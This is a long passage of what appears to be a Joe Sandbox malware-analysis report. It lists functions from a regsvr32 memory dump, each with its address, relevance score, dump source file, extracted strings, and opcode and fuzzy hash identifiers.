                                                                      • Instruction Fuzzy Hash: F58108B050434E8FCB88DF68D88A6DE7FF0FB58358F105659E85A96250D3B8D694CF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000131C Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %
                                                                      • API String ID: 0-3714942587
                                                                      • Opcode ID: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                      • Instruction ID: d5d5bf94d11651037a836977de8f66422f038c9f5d7a5f915f0cc542ec650b78
                                                                      • Opcode Fuzzy Hash: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                      • Instruction Fuzzy Hash: 5A516974606608CBDB69DF38D4D57A937E1EF68305F20412DF866C72A2DB70D9258B88
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000D8C4 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: A.}
                                                                      • API String ID: 0-2880059976
                                                                      • Opcode ID: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                      • Instruction ID: 2f0cd8bb00c33d355f5bc07b1ff950bf82d6730f12d3cb6082a6ef1b734ff39e
                                                                      • Opcode Fuzzy Hash: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                      • Instruction Fuzzy Hash: 8E618FB190078E8FCF48DF68C88A5DE7BB1FB58318F004A1DE86696250D7B49A65CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180001D68 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0#
                                                                      • API String ID: 0-456275806
                                                                      • Opcode ID: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                      • Instruction ID: 4563f3e02f76dde2de765371aa44af8a356bdaf4307918038d119139e73a9611
                                                                      • Opcode Fuzzy Hash: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                      • Instruction Fuzzy Hash: A6415E70608B488FC768DF19D4897AABBF1FB99301F404A6DE58AC7251DB70D849CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180008CA0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: n)
                                                                      • API String ID: 0-1227437150
                                                                      • Opcode ID: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                      • Instruction ID: dd456011ca79f85f31d8ff0d6df60f6896318ebd7e2af4f5172cd91629f08304
                                                                      • Opcode Fuzzy Hash: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                      • Instruction Fuzzy Hash: 9761ADB090074E8FCB48DF68D58A5CE7FF0FB68398F204219E856A6260D37496A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001EB30 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H&0
                                                                      • API String ID: 0-1691334370
                                                                      • Opcode ID: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                      • Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
                                                                      • Opcode Fuzzy Hash: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                      • Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018002870C Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <+o
                                                                      • API String ID: 0-2035106886
                                                                      • Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                      • Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
                                                                      • Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                      • Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180015388 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2d
                                                                      • API String ID: 0-3866551247
                                                                      • Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                      • Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
                                                                      • Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                      • Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800250CC Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ZF{;
                                                                      • API String ID: 0-2351138993
                                                                      • Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                      • Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
                                                                      • Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                      • Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180011834 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: o^
                                                                      • API String ID: 0-3380573087
                                                                      • Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                      • Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
                                                                      • Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                      • Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180017CE4 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8N
                                                                      • API String ID: 0-1657423088
                                                                      • Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                      • Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
                                                                      • Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                      • Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180002178 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J3n
                                                                      • API String ID: 0-3694000235
                                                                      • Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                      • Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
                                                                      • Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                      • Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001F7C0 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c&A
                                                                      • API String ID: 0-649646960
                                                                      • Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                      • Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
                                                                      • Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                      • Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800029BC Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (3
                                                                      • API String ID: 0-2570504824
                                                                      • Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                      • Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
                                                                      • Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                      • Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018002C7B4 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [r\^
                                                                      • API String ID: 0-4041245994
                                                                      • Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                      • Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
                                                                      • Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                      • Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180019FDC Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X
                                                                      • API String ID: 0-1684620495
                                                                      • Opcode ID: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                      • Instruction ID: c074d48008b4f0de6335b08329d09b3dcf7b4425e670a70b5eb694557c772c54
                                                                      • Opcode Fuzzy Hash: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                      • Instruction Fuzzy Hash: CD31C27050074A8BCF48DF68C48A5DE7FA1BB68388F204619F85A96250D3B896A9CBC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180002790 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [[x
                                                                      • API String ID: 0-2553898450
                                                                      • Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                      • Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
                                                                      • Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                      • Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001E960 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: g\&
                                                                      • API String ID: 0-1994035986
                                                                      • Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                      • Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
                                                                      • Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                      • Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000338C Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X
                                                                      • API String ID: 0-1684620495
                                                                      • Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                      • Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
                                                                      • Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                      • Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800095DC Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: GfMu
                                                                      • API String ID: 0-241548529
                                                                      • Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                      • Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
                                                                      • Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                      • Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000F9E8 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: k|
                                                                      • API String ID: 0-998972391
                                                                      • Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                      • Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
                                                                      • Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                      • Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001D950 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: wz_
                                                                      • API String ID: 0-2163964638
                                                                      • Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                      • Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
                                                                      • Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                      • Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000580C Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {?Q
                                                                      • API String ID: 0-927583641
                                                                      • Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                      • Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
                                                                      • Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                      • Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180021510 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: |}6\
                                                                      • API String ID: 0-3074799505
                                                                      • Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                      • Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
                                                                      • Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                      • Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001FA38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 3&a
                                                                      • API String ID: 0-537350193
                                                                      • Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                      • Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
                                                                      • Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                      • Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001435C Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: o0:X
                                                                      • API String ID: 0-645126758
                                                                      • Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                      • Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
                                                                      • Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                      • Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180020CFC Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D4}
                                                                      • API String ID: 0-491520632
                                                                      • Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                      • Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
                                                                      • Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                      • Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AAA0C Relevance: .3, Instructions: 260COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                      • String ID:
                                                                      • API String ID: 1583075380-0
